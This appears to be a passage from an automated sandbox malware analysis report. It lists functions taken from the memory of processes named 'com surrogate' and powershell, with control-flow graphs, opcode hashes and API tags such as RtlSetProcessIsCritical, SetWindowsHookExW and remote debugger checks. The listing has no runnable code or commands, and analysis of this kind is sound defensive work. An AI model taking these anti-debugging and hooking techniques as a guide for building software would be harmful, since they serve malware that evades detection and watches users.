                                                                            • Instruction Fuzzy Hash: 11F19530A09A8D4FEBA8DF28C855BE977E1FF54310F04426EE85DC72A5DB34E9458B81
                                                                            Function 00007FFD9B7E7242 Relevance: 3.0, Strings: 2, Instructions: 459COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 618 7ffd9b7e7242-7ffd9b7e724f 619 7ffd9b7e725a-7ffd9b7e7327 618->619 620 7ffd9b7e7251-7ffd9b7e7259 618->620 623 7ffd9b7e7329-7ffd9b7e7332 619->623 624 7ffd9b7e7393 619->624 620->619 623->624 626 7ffd9b7e7334-7ffd9b7e7340 623->626 625 7ffd9b7e7395-7ffd9b7e73ba 624->625 632 7ffd9b7e73bc-7ffd9b7e73c5 625->632 633 7ffd9b7e7426 625->633 627 7ffd9b7e7379-7ffd9b7e7391 626->627 628 7ffd9b7e7342-7ffd9b7e7354 626->628 627->625 630 7ffd9b7e7356 628->630 631 7ffd9b7e7358-7ffd9b7e736b 628->631 630->631 631->631 634 7ffd9b7e736d-7ffd9b7e7375 631->634 632->633 635 7ffd9b7e73c7-7ffd9b7e73d3 632->635 636 7ffd9b7e7428-7ffd9b7e744d 633->636 634->627 637 7ffd9b7e740c-7ffd9b7e7424 635->637 638 7ffd9b7e73d5-7ffd9b7e73e7 635->638 642 7ffd9b7e74bb 636->642 643 7ffd9b7e744f-7ffd9b7e7459 636->643 637->636 639 7ffd9b7e73e9 638->639 640 7ffd9b7e73eb-7ffd9b7e73fe 638->640 639->640 640->640 644 7ffd9b7e7400-7ffd9b7e7408 640->644 646 7ffd9b7e74bd-7ffd9b7e74eb 642->646 643->642 645 7ffd9b7e745b-7ffd9b7e7468 643->645 644->637 647 7ffd9b7e746a-7ffd9b7e747c 645->647 648 7ffd9b7e74a1-7ffd9b7e74b9 645->648 653 7ffd9b7e755b 646->653 654 7ffd9b7e74ed-7ffd9b7e74f8 646->654 649 7ffd9b7e747e 647->649 650 7ffd9b7e7480-7ffd9b7e7493 647->650 648->646 649->650 650->650 652 7ffd9b7e7495-7ffd9b7e749d 650->652 652->648 655 7ffd9b7e755d-7ffd9b7e7635 653->655 654->653 656 7ffd9b7e74fa-7ffd9b7e7508 654->656 666 7ffd9b7e763b-7ffd9b7e764a 655->666 657 7ffd9b7e750a-7ffd9b7e751c 656->657 658 7ffd9b7e7541-7ffd9b7e7559 656->658 660 7ffd9b7e751e 657->660 661 7ffd9b7e7520-7ffd9b7e7533 657->661 658->655 660->661 661->661 662 7ffd9b7e7535-7ffd9b7e753d 661->662 662->658 667 7ffd9b7e764c 666->667 668 7ffd9b7e7652-7ffd9b7e76b4 call 7ffd9b7e76d0 666->668 667->668 675 7ffd9b7e76bb-7ffd9b7e76cf 668->675 676 7ffd9b7e76b6 668->676 676->675
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: l_Z$l_Z
                                                                            • API String ID: 0-3759237847
                                                                            • Opcode ID: 395c5869ad1cfcc651178767a3a2886c7dff53b08719c6185c94ebf737d09b5d
                                                                            • Instruction ID: e0d0158ebce2b0cbc78b2becb08d0c7c703110852b7f2fbbc33d0ba9068a2ae9
                                                                            • Opcode Fuzzy Hash: 395c5869ad1cfcc651178767a3a2886c7dff53b08719c6185c94ebf737d09b5d
                                                                            • Instruction Fuzzy Hash: EFE1C530A09A8D4FEBA8DF28C8597E977D1FF54310F14436ED84DC72A5DB78A9408B81
                                                                            Function 00007FFD9B7E16E9 Relevance: 2.0, Strings: 1, Instructions: 796COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 742 7ffd9b7e16e9-7ffd9b7e1720 743 7ffd9b7e1726-7ffd9b7e1855 call 7ffd9b7e0638 * 8 call 7ffd9b7e0a40 742->743 744 7ffd9b7e1f54-7ffd9b7e1f9b 742->744 785 7ffd9b7e1857-7ffd9b7e185e 743->785 786 7ffd9b7e185f-7ffd9b7e18d6 call 7ffd9b7e04b8 call 7ffd9b7e04b0 call 7ffd9b7e0358 call 7ffd9b7e0368 743->786 785->786 801 7ffd9b7e18e9-7ffd9b7e18f9 786->801 802 7ffd9b7e18d8-7ffd9b7e18e2 786->802 805 7ffd9b7e18fb-7ffd9b7e191a call 7ffd9b7e0358 801->805 806 7ffd9b7e1921-7ffd9b7e1941 801->806 802->801 805->806 812 7ffd9b7e1952-7ffd9b7e19b6 call 7ffd9b7e1008 806->812 813 7ffd9b7e1943-7ffd9b7e194d call 7ffd9b7e0378 806->813 823 7ffd9b7e19bc-7ffd9b7e1a51 812->823 824 7ffd9b7e1a56-7ffd9b7e1ae4 812->824 813->812 843 7ffd9b7e1aeb-7ffd9b7e1c29 call 7ffd9b7e1320 call 7ffd9b7e0860 call 7ffd9b7e0388 call 7ffd9b7e0398 823->843 824->843 867 7ffd9b7e1c2b-7ffd9b7e1c5e 843->867 868 7ffd9b7e1c77-7ffd9b7e1caa 843->868 867->868 875 7ffd9b7e1c60-7ffd9b7e1c6d 867->875 878 7ffd9b7e1cac-7ffd9b7e1ccd 868->878 879 7ffd9b7e1ccf-7ffd9b7e1cff 868->879 875->868 880 7ffd9b7e1c6f-7ffd9b7e1c75 875->880 882 7ffd9b7e1d07-7ffd9b7e1d3e 878->882 879->882 880->868 888 7ffd9b7e1d63-7ffd9b7e1d93 882->888 889 7ffd9b7e1d40-7ffd9b7e1d61 882->889 891 7ffd9b7e1d9b-7ffd9b7e1e6a call 7ffd9b7e03a8 call 7ffd9b7e11e0 call 7ffd9b7e09e0 888->891 889->891 907 7ffd9b7e1e6b-7ffd9b7e1e82 call 7ffd9b7e1008 891->907 912 7ffd9b7e1e89-7ffd9b7e1ec8 907->912 913 7ffd9b7e1e84 call 7ffd9b7e1258 907->913 912->907 919 7ffd9b7e1eca-7ffd9b7e1f22 912->919 913->912
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CAN_^
                                                                            • API String ID: 0-3098826533
                                                                            • Opcode ID: f7fe5b7da575121b7138d1885e816c4a5c8d56325c55edd54fdb2747265396b5
                                                                            • Instruction ID: c050053cf71f0c963fde4d07e28a9d362926b97b6720aae51ba9d4321a0e6406
                                                                            • Opcode Fuzzy Hash: f7fe5b7da575121b7138d1885e816c4a5c8d56325c55edd54fdb2747265396b5
                                                                            • Instruction Fuzzy Hash: 2032C760B19A494FE7A8EB688476ABD77D1FFD8704F5506B9E00DC33E6DE28A8018741
                                                                            Function 00007FFD9B7E7A41 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: cc88a98ac13735af6e8366722bb41ca71d5dbd26ea9d3cafc8cf37d01b49b8f3
                                                                            • Instruction ID: 735839a8710612437323314558fea2ddf29c8eeabc0f741c48b9b11d0f80d79c
                                                                            • Opcode Fuzzy Hash: cc88a98ac13735af6e8366722bb41ca71d5dbd26ea9d3cafc8cf37d01b49b8f3
                                                                            • Instruction Fuzzy Hash: F7410231A0875C8FCB58DF98C8466ED7BF0FF65311F0542AAD489D71A2DB34A906CB91
                                                                            Function 00007FFD9B7E2361 Relevance: .4, Instructions: 385COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f04b1bf93bd637d75161b2ec13cc1c168b7dde2d42c8aad6cf775157b6446962
                                                                            • Instruction ID: 7b09990798720ff84f6fb557348fd36f71aa9ca49092aa85b637eba99c1288a3
                                                                            • Opcode Fuzzy Hash: f04b1bf93bd637d75161b2ec13cc1c168b7dde2d42c8aad6cf775157b6446962
                                                                            • Instruction Fuzzy Hash: 76C1D470B1DA4D4FEB98EBA884756B977D2EF99304F450279E04EC32F6DE28A9024741
                                                                            Function 00007FFD9B7E20C5 Relevance: .2, Instructions: 203COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c2b611081e3d0bbd8ff4dcf03fbbc4315b0b454c0f3be7a5b01860c8fff9b79
                                                                            • Instruction ID: 620b32977988567fc8cd7fab7828907bfc4c35dacc7065c1cf9fb71479955b1c
                                                                            • Opcode Fuzzy Hash: 4c2b611081e3d0bbd8ff4dcf03fbbc4315b0b454c0f3be7a5b01860c8fff9b79
                                                                            • Instruction Fuzzy Hash: 39511D10B1E6C94FD79AABB848746A67FE4DF87219B0801FAE09DCB1E7DD181806C342
                                                                            Function 00007FFD9B7EB0DD Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 925 7ffd9b7eb0dd-7ffd9b7eb1c0 RtlSetProcessIsCritical 928 7ffd9b7eb1c8-7ffd9b7eb1fd 925->928 929 7ffd9b7eb1c2 925->929 929->928
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalProcess
                                                                            • String ID:
                                                                            • API String ID: 2695349919-0
                                                                            • Opcode ID: 0b1ff55009d5dd830de577cb34452b68e37a9c6015b264e208263029f5a10e7e
                                                                            • Instruction ID: 09798f6ffda37cfc482baa98ffee10b4aa1b53d75b820fdeed67227b59794cf8
                                                                            • Opcode Fuzzy Hash: 0b1ff55009d5dd830de577cb34452b68e37a9c6015b264e208263029f5a10e7e
                                                                            • Instruction Fuzzy Hash: 9A41F43190C6588FC719DF98D855BE9BBF0EF96311F04416EE09AC3692CB74A446CB91
                                                                            Function 00007FFD9B7EB628 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 944 7ffd9b7eb628-7ffd9b7eb62f 945 7ffd9b7eb63a-7ffd9b7eb6ad 944->945 946 7ffd9b7eb631-7ffd9b7eb639 944->946 950 7ffd9b7eb739-7ffd9b7eb73d 945->950 951 7ffd9b7eb6b3-7ffd9b7eb6c0 945->951 946->945 952 7ffd9b7eb6c2-7ffd9b7eb6ff SetWindowsHookExW 950->952 951->952 954 7ffd9b7eb707-7ffd9b7eb738 952->954 955 7ffd9b7eb701 952->955 955->954
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: 8e0641952458e625ac5edab8e87a0ad70f4989dd584292b336234ab8db2e974e
                                                                            • Instruction ID: cabe22234b108e2cd45aefbd17c48e73c66434d12fc057013be955126c4ff53f
                                                                            • Opcode Fuzzy Hash: 8e0641952458e625ac5edab8e87a0ad70f4989dd584292b336234ab8db2e974e
                                                                            • Instruction Fuzzy Hash: A3411630A0CA5C4FDB58DF58985A6F9BBE1EF99321F00027FD04DD32A2CE64A80287C1

                                                                            Executed Functions

                                                                            Function 00007FFD9B896605 Relevance: .4, Instructions: 441COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871852084.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 971fbc99910d1e1f57fc32d4cc04cba9630715969924d8e89384917bb75ffa0f
                                                                            • Instruction ID: ce5418496ade33a0a1af82b666a83cfbeac1b44385355931f19f682961e691d4
                                                                            • Opcode Fuzzy Hash: 971fbc99910d1e1f57fc32d4cc04cba9630715969924d8e89384917bb75ffa0f
                                                                            • Instruction Fuzzy Hash: 6ED15772A0FA8E5FEB65EB6848755B97FE1EF0A294B0901FED44CC70E3D918A805C341
                                                                            Function 00007FFD9B894073 Relevance: .2, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871852084.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01a8e69ebaba0d1e6d20de5063132f72343d255a30cd182b430b3d4ca4e15216
                                                                            • Instruction ID: de9726cb6417bd8dafb00283af9047f00b23e21e7d929c8a0656c8e35fc57acb
                                                                            • Opcode Fuzzy Hash: 01a8e69ebaba0d1e6d20de5063132f72343d255a30cd182b430b3d4ca4e15216
                                                                            • Instruction Fuzzy Hash: 75514C22B0EA8A0FEBB9CB5C54215747BD2EF99210B1D00BED05EC71E7DE14EC058341
                                                                            Function 00007FFD9B894370 Relevance: .1, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871852084.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e2721aef1b586af601a9b57ed60669b53fc2f67d22975845791e64178032f5a
                                                                            • Instruction ID: a9215671455400cd54468cad3e90af6fc28f7522e74b25f27fbdecef09c913a2
                                                                            • Opcode Fuzzy Hash: 3e2721aef1b586af601a9b57ed60669b53fc2f67d22975845791e64178032f5a
                                                                            • Instruction Fuzzy Hash: 4D410632B0EA894FEBB9D7785431AB97BD1EF89220B0D01FED05DC71A7E915AD008341
                                                                            Function 00007FFD9B7C9788 Relevance: .1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871135471.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b7c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e06d3117905f586dfa620b476c0a50de4b8ae609c974ed173616e887e493078f
                                                                            • Instruction ID: f5e11789844564bafe9a5cf98bb5cf80960e12d49439c48dc764e09d0e747894
                                                                            • Opcode Fuzzy Hash: e06d3117905f586dfa620b476c0a50de4b8ae609c974ed173616e887e493078f
                                                                            • Instruction Fuzzy Hash: 7D31953191CB4C9FDB589B5C984A6B97BE0FB99711F00422FE449D3251CB70A8558BC6
                                                                            Function 00007FFD9B7CA1D3 Relevance: .1, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871135471.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b7c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b53f32e8fe87d67ed42235c5a65be8a37f43bf6e74bed597e8af7fa929a6ccb
                                                                            • Instruction ID: 3bff0894104a69d06004e76ef8dc113c0531d99c390f7b95d78d038c05f95abd
                                                                            • Opcode Fuzzy Hash: 6b53f32e8fe87d67ed42235c5a65be8a37f43bf6e74bed597e8af7fa929a6ccb
                                                                            • Instruction Fuzzy Hash: 85317E77A0A6894FD712EF5CD8A60E47BB0FF6022A70902F7D09CCB263ED00595A8385
                                                                            Function 00007FFD9B7CA62C Relevance: .1, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871135471.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b7c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c4cf4631b5afabc6c33603cb87693020bd1643dfc54227a6cfd508d804d0086d
                                                                            • Instruction ID: c1959fd8c8a63c42763fc8717d24e51c7ed01830ecdbb71093e09f28490a6bcf
                                                                            • Opcode Fuzzy Hash: c4cf4631b5afabc6c33603cb87693020bd1643dfc54227a6cfd508d804d0086d
                                                                            • Instruction Fuzzy Hash: AA21F73090CB4C4FEB59DBA8984A6F97BF0EB96321F04426FD049C3166DA749416CB91
                                                                            Function 00007FFD9B8940BF Relevance: .1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871852084.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9606b0464e9eceb275b523ee76af23c5e0b954fe8f7f1909a39db775727aabd9
                                                                            • Instruction ID: 2d237f75107e0fd34d50943d3b39fc61e71e0618588d7ca1c39f819ab3fd6ea3
                                                                            • Opcode Fuzzy Hash: 9606b0464e9eceb275b523ee76af23c5e0b954fe8f7f1909a39db775727aabd9
                                                                            • Instruction Fuzzy Hash: CE21D222B0FA8B4FEBB9CB5844725746AD2EF69210B5E00BED05EC71F2DE18EC048341
                                                                            Function 00007FFD9B8943BC Relevance: .1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871852084.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a4d13c6ec0dd104c6c22a6697693420bf461db1c267a4ccf0846aa88e76c93d
                                                                            • Instruction ID: 9f00a468e14b34d31088d3abae526d04a69d61a9d82c305a62e0b8dda2c35b23
                                                                            • Opcode Fuzzy Hash: 3a4d13c6ec0dd104c6c22a6697693420bf461db1c267a4ccf0846aa88e76c93d
                                                                            • Instruction Fuzzy Hash: 2F119132B0F5894FEBB5D7A854749B87AD1EF4822074E00FAD05DC75A6D915AD009341
                                                                            Function 00007FFD9B6AE41F Relevance: .1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1870625138.00007FFD9B6AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6AD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b6ad000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                            • Instruction ID: 815f18af67384c9d322fef8c95c996acbc8591d084aace1e542d347d4d64d602
                                                                            • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                            • Instruction Fuzzy Hash: 95014F3260CE088F9AA4EF5DE48595277E0FB98320710065AD45DC755AD731F891CBC1
                                                                            Function 00007FFD9B7C33B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871135471.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b7c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                            • Instruction ID: 995c809a1818668ffa22beee52c015c350a696e0f72191c51961a08a26fb3fe4
                                                                            • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                            • Instruction Fuzzy Hash: 7701A73020CB0C4FD748EF0CE051AB5B3E0FB85320F10066DE58AC36A1DA32E882CB41

                                                                            Non-executed Functions

                                                                            Function 00007FFD9B7C8995 Relevance: 5.1, Strings: 4, Instructions: 144COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871135471.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b7c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: O_^$O_^$O_^$O_^
                                                                            • API String ID: 0-934926442
                                                                            • Opcode ID: ae36f556644e6cbebdc704c909089c04a7d903e6c059cce44775627ae207e835
                                                                            • Instruction ID: 1c03dcedda0d8efdf43468de09534b18771b4150549c0e5c69b5cbd4712314b2
                                                                            • Opcode Fuzzy Hash: ae36f556644e6cbebdc704c909089c04a7d903e6c059cce44775627ae207e835
                                                                            • Instruction Fuzzy Hash: 0E41C476A0F7C65FD316976988790A47FA0EF5221570A02FBC0DD8F2B3ED1869068355
                                                                            Function 00007FFD9B7C8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871135471.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b7c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: O_^4$O_^7$O_^F$O_^J
                                                                            • API String ID: 0-875994666
                                                                            • Opcode ID: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                            • Instruction ID: ab589c579b4ad75735dcbaf43b2ede4ba352a80dd2bb0dc811af8f81fd8a421f
                                                                            • Opcode Fuzzy Hash: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                            • Instruction Fuzzy Hash: 9C21077BB181659ED305BB7DB8189DD3750CFD423A35642F2D1AE8F283ED1470868690

                                                                            Executed Functions

                                                                            Function 00007FFD9B8B660A Relevance: .5, Instructions: 466COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1987073385.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6365ff751f30462ed237745a6e88f2b9539f072ca79909f34e8a77b6963a314
                                                                            • Instruction ID: 515f58cc8cd60bbaafe878fee7768e14a6c00161a51972b48eb46199ed7e182f
                                                                            • Opcode Fuzzy Hash: b6365ff751f30462ed237745a6e88f2b9539f072ca79909f34e8a77b6963a314
                                                                            • Instruction Fuzzy Hash: 4CD14672B0EA9E4FEB65AB7848655B5BBE0EF5A310B0901FED44CC70E3D918E8058781
                                                                            Function 00007FFD9B7EA828 Relevance: .2, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1986104067.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5771be3792f002a8ed397531a052e5046e4adcf799ee6ad8853b5104bd57c7f0
                                                                            • Instruction ID: adbb3024367a45f5f7db2b120b3185398d2c1fdfc8d711a1cbf2d97575b47d90
                                                                            • Opcode Fuzzy Hash: 5771be3792f002a8ed397531a052e5046e4adcf799ee6ad8853b5104bd57c7f0
                                                                            • Instruction Fuzzy Hash: C651393160D7894FD71ADF68C8E58647BE0EF5631870502BED48AC71B7EE29A843C711
                                                                            Function 00007FFD9B7E9750 Relevance: .1, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1986104067.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 91d7a5ac2b62f1a98149bba276c8009955b659cde9994f1d956ded2433d3f154
                                                                            • Instruction ID: fa06a155af7fd6fae5aa3f14d57a3fd8d43659c4b8ff24015028eb3ecea80c27
                                                                            • Opcode Fuzzy Hash: 91d7a5ac2b62f1a98149bba276c8009955b659cde9994f1d956ded2433d3f154
                                                                            • Instruction Fuzzy Hash: 91411B7190DB884FEB199F5C9C1A6BD7FE0EF55310F04426FD499932A2CA74B805C782
                                                                            Function 00007FFD9B6CED40 Relevance: .1, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1985196363.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b6cd000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac7b2e699745723cfb6f9001990a780d16efda06e3f8537466126ddd5c948000
                                                                            • Instruction ID: 308e41ed1aa4fcd221c2395994f46423c876b22b36b461a3b7fe0907895cba39
                                                                            • Opcode Fuzzy Hash: ac7b2e699745723cfb6f9001990a780d16efda06e3f8537466126ddd5c948000
                                                                            • Instruction Fuzzy Hash: C541057140EBC44FE766AB2898559623FF0EF56220B1A05DFD098CB1A3D629B845C792
                                                                            Function 00007FFD9B7EA73C Relevance: .1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1986104067.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
